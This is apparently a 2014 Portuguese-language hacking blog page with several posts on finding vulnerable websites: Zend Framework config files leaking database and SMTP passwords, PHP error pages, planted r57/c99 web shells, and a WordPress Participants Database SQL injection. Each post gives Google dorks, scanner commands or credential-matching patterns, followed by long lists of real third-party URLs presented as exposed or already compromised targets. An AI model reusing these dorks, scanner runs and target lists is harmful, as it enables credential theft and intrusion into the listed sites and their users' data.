Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador string. Mostrar todas as postagens
Mostrando postagens com marcador string. Mostrar todas as postagens

quarta-feira, 16 de julho de 2014

Explorando falha no Zend Framework Full Info Disclosure

Explorando Full Info Disclosure

Explorando falha no Zend Framework Full Info Disclosure

Tal falha disponibiliza a leitura do arquivo ini dentro de aplicações web que usam  Zend Framework, tais aquivos contem senhas de bancos e smtp.

Vulnerabilidade[0]=> http://target.com/application/configs/{arquivo}.ini
Ex:
http://target.com/application/configs/application.ini
http://target.com/application/configs/db.ini
http://target.com/application/configs/config.ini

Conteúdo de arquivo podemos encontrar os seguintes parâmetros.


//Dados de acesso banco
resources.db.params.host = "mysql.taget.com.br"
resources.db.params.username = "root"
resources.db.params.password = "123455"


//E também dados de acesso smtp
resources.mail.transport.host ="smtp.target.com.br"
resources.mail.transport.auth = "loginre"
sources.mail.transport.username = "wangxydlutre"
sources.mail.transport.password = "12333"


DORK[0]=> inurl:/application/configs/application.ini

DORK[1]=>
site:com ext:ini inurl:/application/  -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"

DORK[2]=> -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini

DORK[3]=> inurl:/configs/ "params.password" db.ini ext:ini

DORK[4]=> -github.com -mozilla.org -.google.com inurl:/application/  ext:ini password



[+][ COMMND SCANNER INURLBR ]
./inurlbr.php --dork 'site:com ext:ini inurl:/application/  -github -assembla -inurl:mozilla -inurl:svn "params.password"'  -s zend.txt -q 1,6,7,14,22


[+][ VALIDATION ZEND FRAMEWORK ]
$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';

0xExemplo de achado:

0xExemplo de achado: zend

https://www.thoex.com/urrunarrak-handball/application/configs/application.ini?
https://www.thoex.com/urrunarrak2/application/configs/application.ini?
http://www.rydusa.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?


http://www.getsocialwithrb.com/rec0219/airwick/application/configs/application.ini
http://www.aps-cctv.com/boardPhotos/application.ini
http://snobmonkey.com/test/application/configs/application.ini
http://velcro-lab.com/touch/application/configs/application.ini
http://www.ratcmatrimony.com/application/configs/application.ini
http://ucgoz.com/deneme2/application/configs/application.ini
http://ifood.introserver.com/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/admin/application/configs/application.ini
http://www.altusinfra.com/application/configs/application.ini
http://www.thenamesticker.com/application/configs/application.ini
http://stasdavydov.com/price_cmp/application/configs/application.ini
https://www.mitylite.com/application/configs/application.ini
http://dev.blancali.com/_old2/application/configs/application.ini
http://city-immobilier.com/application/configs/application.ini
http://www.emotionla.com/staging/vivanda/vivanda-mobile/application/configs/application.ini
http://23sec.com/api/application/configs/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
http://www.rydusa.com/application/configs/application.ini
http://www.prod2020.com/_hybris-cra/application/configs/application.ini
http://xolotlti.com/fabricadecine/application/configs/application.ini
http://www.test.unibox.com/application/configs/application.ini
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini
http://users.spytosave.com/spyapp/application/configs/application.ini
http://www.monigrafica.com/application/configs/application.ini
http://clossmancommunications.com/frapi/admin/application/config/application.ini
http://archi-tech-media.com/thedigitalkingdom/application/configs/application.ini
http://www.kreatera.com/library/Benux/Application/configs/application.ini
http://li258-109.members.linode.com/application/configs/application.ini
http://www.techques.com/question/1-4484965/How-to-set-database-time-zone-in-application.ini
http://bizarrefx.com/bfx/searchd/application/configs/application.ini
http://www.hellobrothers.com/jobs/application.ini
http://www.ovdev.mit-consult.com/exc1/application/configs/application.ini
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini
http://www.digilibro.com/Crisol/RestServer/application/configs/application.ini
http://secure.vfwebserver.com/ewe/application/configs/application.ini
http://ihuntyou.com/agrobrain/trunk/application/configs/application.ini
http://ronlinecdn.com/st/application/configs/application.ini
http://yodpolitician.yodsoft.com/application/configs/application.ini
http://kerberosdevelopment.com/centurion/application/configs/db.ini
http://www.dev-stagingserver.com/noophy/application/configs/application.ini
http://www.intell-sol.com/subdomains/wandelion/admin/application/configs/application.ini
http://paintourhome.com/application/configs/application.ini
http://www.mywebsitedemos.com/broomberg/application/configs/application.ini
http://fidelcrm.com/fbconnect/zblog/application/configs/application.ini
http://developermalik.com/chad/application/configs/application.ini
http://developermalik.com/uPolitics/application/configs/application.ini
http://km.comuf.com/application/configs/application.ini
http://qljsystems.com/doctrine2/ralphschindler-NOLASnowball-3c9f906/application/configs/application.ini
http://50-87-21-130.unifiedlayer.com/astonis/application/configs/application.ini
http://bepcongnghiepjsc.com/application/configs/application.ini
http://galaxybis.com/demos/zf1/application/configs/application.ini
http://masdag.com/watchit/application/configs/config.ini
http://www.comsucopia.com/application/configs/application.ini
http://campusrain.com/wow/application/configs/application.ini
http://www.myanmar-restaurants.com/updates/myanmar/stage/application/configs/sites/myanmar-updates.ini
http://churchcims.com/staging/application/configs/application.ini
http://hashib23.uniquewebers.com/hospital/application/configs/application.ini
http://support.orioly.com/svjetskiputnik.hr/application/configs/application.ini
http://tmh.riktamtech.com/blinkword/application/configs/application.ini
http://shopping.idincorp.com/application/configs/application.ini
https://www.arabforwarding.com/vhosts/loyacjordan.org/httpdocs/loyac/application/configs/application.ini
https://www.arabforwarding.com/vhosts/__www.fnms-medical.com/httpdocs/application/configs/application.ini
http://elamatute.com/application/configs/application.ini
http://www.originalsexnetwork.com/application/configs/application.ini
http://www.palstu.com/contactus2/application/configs/application.ini
http://web.ontuts.com/wp-content/uploads/tutoriales/zendframework/zendframework_layouts/application/config/application.ini
https://daralyasmine.com/vhosts/daralyasmine.com/httpdocs/application/configs/application.ini
http://www.tributosonline.com/application/configs/application.ini
http://www.nichequotes.com/zend/application/config.ini
http://webkathon.com/alumni/application/configs/application.ini
http://web1.kindlebit.com/PHP-Team/vijay/don/codecanyon-4210316-monsterfile-multiuser-file-management/MonsterFile/application/configs/monster.ini
http://www.investmysite.com/application/config/config_db.ini
http://dulichcampuchiagiare.com/application/configs/application.ini
http://eshopbox.com/checkout/application/configs/application.ini
http://www.oi915.com/application/modules/admin/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
http://www.prod2020.com/france-tv/application/configs/db.ini
http://amdinner.com/admin/application/application.ini
http://www.emotionla.com/clientes/plazavea/plazavea-qr/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/application/configs/application.ini
http://www.palstu.com/tawjihi/application/configs/application.ini
http://ronlinecdn.com/sap/application/configs/application.ini
http://myanmar-restaurants.com/updates/movie/prod/application/configs/sites/myanmar-updates.ini
Exploit:
http://www.exploit-db.com/exploits/29921/

sexta-feira, 20 de junho de 2014

DORK encontra erros non-object

Procurando notícias sobre erros de tratamentos PDO ou simples consultas SQL/Objetos.

Procurando notícias sobre erros de tratamentos PDO ou simples consultas SQL/Objetos.


 ----------------------------------------------------------------------------------------------------------------------------
DORK:
inurl:br  intext:"Warning" || intext:"notice" "non-object in /" -"Revista PHP" -inurl:forum.
----------------------------------------------------------------------------------------------------------------------------
DORK encontra erros non-object
0xHOST GOOGLE........: www.google.com.br
0xDORK...............: inurl:br   intext:"Warning" || intext:"notice" "non-object in /" -"Revista PHP" -inurl:forum.
0xEXPLOIT............:
0xARQUIVO............: resultados.txt
0xTIPO DE ERRO.......: 2
0xPROCURAR NO ALVO...: non-object in
0xCOMANDO TERMINAL...: ping -c _ALVO_
0xIP PROXY...........:
0xPORTA..............:

----------------------------------------------------------------------------------------------------------------------------

DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => non-object in
    [cmd] => ping -c _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.&num=1900&btnG=Search
    [port] => 80
)
RESULTADO:

TOTAL DE URL's: 196
EXPLOIT USADO:
DORK: inurl%3Abr+++intext%3A%22Warning%22+%7C%7C+intext%3A%22notice%22+%22non-object+in+%2F%22+-%22Revista+PHP%22+-inurl%3Aforum.
TOTAL DE POSSÍVEIS VULL: 78
ARQUIVO COM RESULTADO:resultados.txt
LISTA:

http://www.congressomedicopf.com.br/3/5/local
http://webcache.googleusercontent.com/search?q=cache:mHMik8Hn39cJ:http://www.congressomedicopf.com.br/3/5/local%2Binurl:br+++intext:%22Warning%22+%7C%7C+intext:%22notice%22+%22non-object+in+/%22+-%22Revista+PHP%22+-inurl:forum.&num=1900&hl=pt-BR&&ct=clnk
http://www.minhaentrada.com.br/evento/b
http://webcache.googleusercontent.com/search?q=cache:dujAQvNUaScJ:http://www.minhaentrada.com.br/evento/b%2Binurl:br+++intext:%22Warning%22+%7C%7C+intext:%22notice%22+%22non-object+in+/%22+-%22Revista+PHP%22+-inurl:forum.&num=1900&hl=pt-BR&&ct=clnk
http://www.3dcloner.com.br/post/conteudo-2/6/
http://www.gaiaexp.com.br/circuito-gaiaexp-trekking/pousada-sao-joao-da-mata/calendario-de-provas
http://www.phipasa.com.br/videos.php?id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Trying%20to%20get%20property%20of%20non-object%20in%20%3Cb%3E/home/storage/1/e8/f2/phipasa/public_html/modulos/videos/box-videos.php%3C/b%3E%20on%20line%20%3Cb%3E25%3C/b%3E%3Cbr%20/%3E
http://colinas.to.gov.br/conteudo/mi-dengue/263
http://www.shoppingvilla-lobos.com.br/index.php?option=com_loja&view=&Itemid=&codloja=9926944
http://www.shoppingvilla-lobos.com.br/index.php?option=com_loja&view=loja&Itemid=3&codloja=%3Cbr%20/%3E_%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20property:%20stdClass::$COD_PESSOA%20in%20%3Cb%3ED:%5CSites%5Cshoppingvilla-lobos.com.br%5Ctemplates%5Csvl%5Chtml%5Ccom_loja%5Cloja%5Cdefault.php%3C/b%3E%20on%20line%20%3Cb%3E87%3C/b%3E%3Cbr%20/%3E_
http://www.ibiuna.sp.gov.br/cidadao_online/%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Trying%20to%20get%20property%20of%20non-object%20in%20%3Cb%3E/home/storage/c/52/9a/ibiuna2/public_html/view/prefeituraibiuna/cidadao_online/index.php%3C/b%3E%20on%20line%20%3Cb%3E42%3C/b%3E%3Cbr%20/%3Ehttp://www.ibiuna.sp.gov.br/cidadao_online/
http://photosblackbox.com.br/evento/2
http://www.brasilatletismo.com.br/noticias/noticias-1/no-ultimo-salto-duda-garante-vaga-na-final
http://www.afmbs.org.br/site/galeria
http://www-antigo.mpmg.mp.br/portal/public/promotoria/buscarpromotoria?idPromotoria=99
https://novosite.uninorte.com.br/galeria/acao-integrada-de-administracao/img_1696/
http://add.capes.gov.br/index.php/pt-BR/metadado.html?view=metadado
http://www.opticasitamaraty.com.br/lojas/item/458-pantas6
http://moradadaviola.tvabcd.com.br/reprises/
http://www.shoppingtacaruna.com.br/alimentacao/ver/297
http://www.riomarrecife.com.br/index.php?option=com_loja&view=&Itemid=&codloja=3763
http://apianet.com.br/filiais.php
http://www.abramppe.org.br/
http://omelhornacopa.com.br/v2/2014/02/
http://www.onetreinamento.com.br/eventos/eventos/saibamais/id/567
http://www.zapatamexicanbar.com.br/promocao/105800
http://www.santuarioscj.com.br/noticias/noticias-da-paroquia/avisos-paroquiais
http://br.sosveterinariaes.com.br/?cat=8
http://www.andes-vertical.com/adventure.php/%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Trying%20to%20get%20property%20of%20non-object%20in%20%3Cb%3E/home/ju000681/public_html/adventure.php%3C/b%3E%20on%20line%20%3Cb%3E140%3C/b%3E%3Cbr%20/%3E/0
http://www.mercadomineiro.com.br/index.php?m=empresa&id=556&empresa=Meta+Corpus+Pilates
http://www.theresinahall.com.br/videos/pr-poderoso-castiga--coletanea-2
http://www.houseekitchen.com.br/categoria/natal
http://www.inf.ufes.br/~rmanola/blog
http://www.fapesp.br/oportunidades/2000
http://liderinteriores.com.br/modulados/produto/office-linea
http://www.agmfr.com.br/index.php?option=com_events&task=view_detail&agid=9&year=2011&month=02&day=23&Itemid=52
http://www.grupoelogica.com.br/site/?go=clientes
http://www.criativa.com.br/trabalhos/
http://www.direitovirtual.com.br/diario-oficial/diario-tjpi-06082013-C10539.html
http://www.ceudecapella.com.br/einx/redirecionar-pagamento/2
http://caminhosviagens.com.br/viagem/caminhos-de-maria-C156774.html
http://www.jorlan.com.br/veiculo-novo.php?cid=Goiania
http://www.fundacaosemear.org.br/opinioes/detalhes/codigo/1
http://www.feiradocircuitodasmalhas.com.br/2014/camp-ex/
http://www.inpactopropaganda.com.br/novo/index.php/no-forno/97-campanha-70-anos-escritorio-sao-paulo
http://www.blogcentenario.unifei.edu.br/?page_id=2778
http://www.plaxmetal.com.br/componentes/0
http://www.motoryama.com.br/noticia/noticias_motoryama/7
http://www.onecursos.com.br/eventos/eventos/saibamais/id/692
http://www.datacom.ind.br/new/?q=pt-br/solucoes
https://www.pucci.eng.br/php_errors.log
http://www.ancoraengenharia.com.br/areas-de-atuacao/industriais
http://www.sepluga.com.br/
http://www.scvilaolimpia.com.br/index.php?option=com_loja&view=loja&Itemid=4&codloja=1938707
http://www.lwartimpermeabilizantes.com.br/destaques/destaque/chave/visita-tecnica---aplicadores
http://www.impressoramaster.com.br/loja/balcoes-retirada/campo-largo-rg-grafica-rapida-41-3469-2029
http://www.revistamissoes.org.br/artigos/ler/id/2601
http://www.bairroprado.com.br/detalhes-do-imovel/PR2530V/A0097
http://www.helbor.com.br/detalhes-da-noticia/imprensa/77
http://www.rzartmakeup.com.br/wordpress/portfolio_category/gloss/
http://www.jogosabertos2013.com.br/modalidade/bocha-pcd
http://www.spfilmagem.com.br/view.php?v=OVBRPT0=aae48a48d6e795eF8c90b0523dcaee7Y1ZOHYxTlIocFxpdA==MWE4ZGQxjk4NQ==M&i=WlBRPT0=2e0d3ae5c96fb6bw779a7910be8907cWVZYjA8ak5oLWVcMQ==MWE4ZGQxjk4NQ==M
http://www.fani.com.br/v2/index.php?page=produtos&cid=17
http://3pproducoes.com.br/servicos/
http://www.manoleeducacao.com.br/nutricaoclinica/programacao/aplicabilidade-da-bioimpedancia-eletrica-na-pratica-clinica
http://www.ciplak.com.br/destaques/destaque/chave/treinamento-rio-grande-do-norte
http://200.199.211.77/index.php/br/multimidia/imagens.html?folder=Aeroporto+de+Bras%C3%ADlia
http://quintadogolfe.com.br/clube/historia/
http://www.bolor.com.br/fotos
http://geif.com.br/categoria/conferencia-estadual-espirita-do-parana/
http://www.rccsc.com.br/interatividade/agenda/metanoia-2014-06-20
http://www.ipb.org.br/tv/tv4-19125044997583967
http://cefort.ufam.edu.br/portal/index.php?option=com_content&task=view&id=26&Itemid=48
http://www.assisimoveisjatai.com.br/imovel/single/3
http://nucleope.com.br/lancamentos/?id=52
http://viacatarina.com.br/lojas/detalhe/74
http://acervofundiario.incra.gov.br/i3geo/testamapfile.php?map=dnpm
http://rberaldo.com.br/as-mensagens-de-erros-mais-comuns-do-php/
[email protected]:/home/cleiton/pentest/Scanurl#

quarta-feira, 11 de junho de 2014

Pegando aquele shell marota com dork


PEI PEI PEI ACESSEI SUA 0xHACKINAGEM s2
R57 PEI PEI PEI ACESSEI SUA 0xHACKINAGEM s2

0xDORK[0]: intext:"r57shell" || intext:"c99 shell" & intext:"safe_mode:"  &  -github -google -assembla -forum ext:php  *2014

0xDEBUG SCANNER INURL:
DEBUG SCANNER INURL:
0xBaixar:http://pastebin.com/TzijC99y
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => intext%3A%22r57shell%22+%7C%7C+intext%3A%22c99+shell%22+%26+intext%3A%22safe_mode%3A%22++%26++-github+-google+-assembla+-forum+ext%3Aphp++%2A2014
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => safe_mode:
    [cmd] => ping -c 1 _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=intext%3A%22r57shell%22+%7C%7C+intext%3A%22c99+shell%22+%26+intext%3A%22safe_mode%3A%22++%26++-github+-google+-assembla+-forum+ext%3Aphp++%2A2014&num=1900&btnG=Search
    [port] => 80
)

0x[ALGUNS ACHADOS]
http://revistatucan.com/wp-content/themes/premiumnews/cache/external_b85021247782c61723a5a698c61eff52.php
http://www.chelovek-prazdnik.com/block/gallery/big/1553.php?delete
http://www.rodolatina.com.br/pt/noticias_detalhe.php?idProduto=133
http://www.minmini.com/admin/admin1.php?tmp
http://saxen-paris.com/css/_boot.php/sitemap%20
http://webcache.googleusercontent.com/search?q=cache:Fk9ziSWrgA4J:http://saxen-paris.com/css/_boot.php/sitemap%2520
http://srsoverseas.com.np/index.php?page=about_nepal
http://toy.az/index.php?news=2266
http://webcache.googleusercontent.com/search?q=cache:lYdPGLDr3KIJ:http://toy.az/index.php?news%3D2266
http://maheswaribrothers.com/r2.php?delete

http://jacobthomson.com/phpBB2/index.php
http://saxen-paris.com/css/_boot.php
http://www.minmini.com/admin/admin1.php?tmp
http://revistatucan.com/wp-content/themes/premiumnews/cache/external_b85021247782c61723a5a698c61eff52.php
http://www.chelovek-prazdnik.com/block/gallery/big/1553.php?delete
http://www.m-funtime.com/vb/faq.php?service
http://www.campaniameteo.it/immagini/immagini_articoli/r57.php

terça-feira, 10 de junho de 2014

Exploit Participants Database <= 1.5.4.8 Wordpress

0xParticipants Database
Wordpress Participants Database 1.5.4.8 - SQL Injection

É um plugin Wordpress populares que oferece a funcionalidade necessária para construir e manter um banco de dados de pessoas.

É um plugin Wordpress populares que oferece a funcionalidade necessária para construir e manter um banco de dados de pessoas. 
Participants Database Wordpress Participants Database 1.5.4.8 - SQL Injection

- Detalhes sobre a Vulnerabilidade 

1.Devido ao privilégio insuficiente verifica que é possível para anonymous(unauthenticated) para desencadear algumas ações administrativas, se algum dos códigos de acesso é utilizado (por exemplo, inscrição de página).

2. A ação "export CSV" tem um parâmetro chamado "query" que pode conter uma consulta SQL arbitrária. 
Isso significa que um usuário não autenticado pode executar instruções SQL arbitrários (por exemplo, criar um usuário administrador, ler ou escrever arquivos ou executar código dependendo dos privilégios de usuário do MySQL).  

----------------------------------------------------------------------------------------------------------------------------------
0xEXPLOIT:
http://www.exploit-db.com/exploits/33613/


0xDORK[0]:"Index of" "/wp-content/uploads/participants-database"
0xDORK[1]:inurl:"pdb-signup/" "PDB signup"
0xDORK[2]:inurl:"pdb-signup/" intitle:"PDB signup "
----------------------------------------------------------------------------------------------------------------------------------
DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => %22Index+of%22+%22%2Fwp-content%2Fuploads%2Fparticipants-database%22
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => Index of /wp-content/uploads/participants-database
    [cmd] => ping -c 1 _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=%22Index+of%22+%22%2Fwp-content%2Fuploads%2Fparticipants-database%22&num=1900&btnG=Search
    [port] => 80
)






RESULTADO PARCIAL:


http://webcache.googleusercontent.com/search?q=cache:kUL3synKmD0J:http://ebookily.org/xls/gassendi%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:WuVzKwF26PUJ:http://ebookily.org/xls/kathak-dress%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

 http://webcache.googleusercontent.com/search?q=cache:OZ9vR__pkOgJ:http://www.tag.ubc.ca/iswnetwork.ca/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:MS8BxtAMxoAJ:http://www.shreeyashmatrimonial.com/kiran/d/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:l8rmzvOyZOkJ:http://www.younguttarakhand.org/wp/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:t43d046zpLQJ:http://partycrewgh.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:3kQuvZzwr6EJ:http://top3crew.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:gpBnRGnjbxcJ:http://sdara.com/sdarawebsite/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:nHBeHM57ojEJ:http://qsaudi.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:8yfwjuM8apgJ:http://www.blc-denver2.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

http://webcache.googleusercontent.com/search?q=cache:1uEWo4ctyKYJ:http://www.csa.us/www/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:G64f413f7V4J:http://www.gcm73.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:vSoBRrZja70J:http://www.powercollaborative.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:VyTtsWKYn2gJ:http://cccc-houston.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:BAh_697eT80J:http://www.mjbandofgold.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:Luc-zFtM2nEJ:http://www.gapfootball.org.au/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:R6DbMAITjosJ:http://www.4k-nn.ru/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:1ZHqjROYqJ8J:http://www.bcscpa.com/bcs-blog/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:-4lNmZAQJTYJ:http://graceland4kids.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

http://webcache.googleusercontent.com/search?q=cache:seg55mSkGSoJ:http://emeraldtigers.com.au/new_2013_website/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:nR8gLIEbCOEJ:http://artisanwineclub.com/index/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:cn3Yz66lQ-AJ:http://www.dsnyfamily.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:7W_fZ-33EVQJ:http://promovgroup.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:KT4lO7pNnswJ:http://www.rebbepiper.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

 http://webcache.googleusercontent.com/search?q=cache:oujptjZTnnMJ:http://www.firt2013barcelona.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://www.thrombose-cancer.com/wp-content/uploads/participants-database/
http://www.iaodapca.org/wp-content/uploads/participants-database/
http://steppingstoneschina.net/wp-content/uploads/participants-database/
http://leg0lad.com/wp-content/uploads/participants-database/
http://www.nuis.co.il/wp-content/uploads/participants-database/
http://www.bikesforhumanity.com.au/wp-content/uploads/participants-database/
http://lanj.org/wp-content/uploads/participants-database/
http://gearupnv.org/wp-content/uploads/participants-database/
http://www.chruit.ch/wp-content/uploads/participants-database/
http://comartspartner.org/wp-content/uploads/participants-database/
http://thezonegroup.com/wp-content/uploads/participants-database/
http://www.alleywatch.com/wp-content/uploads/participants-database/
http://www.fundraisingwithcheese.com/wp-content/uploads/participants-database/
http://lifespringcommunitychurch.net/wp-content/uploads/participants-database/
http://www.wright-b-flyer.org/wp-content/uploads/participants-database/
